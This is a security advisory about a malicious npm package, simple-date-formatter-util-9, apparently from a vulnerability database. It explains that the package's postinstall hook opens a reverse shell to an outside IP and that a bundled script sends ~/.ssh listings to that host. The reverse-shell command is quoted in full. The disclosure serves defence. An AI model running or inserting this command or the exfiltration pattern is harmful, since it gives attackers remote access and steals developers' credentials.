VDB
KO

MAL-2026-11547

Malicious code in simple-date-formatter-util-9 (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3f3571b881ec73a3ebf6f381b14455f9eff112ba2166366858cfca59b56b2840) package.json declares a postinstall lifecycle hook that executes `bash -i >& /dev/tcp/124.221.154.135/4444 0>&1 &`, opening an interactive reverse shell from the installer's host to 124.221.154.135 on TCP/4444 at `npm install` time. The tarball also ships postinstall.js, which enumerates the installer's ~/.ssh directory with fs.readdirSync and POSTs the results together with os.userInfo() to https://124.221.154.135/post. The package name and 'date formatter' framing are a cover story; the shipped code is an install-time backdoor plus credential-exfiltration payload targeting the installer.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / simple-date-formatter-util-9

No fixed version published yet for simple-date-formatter-util-9 (npm). Pin to a known-safe version or switch to an alternative.

References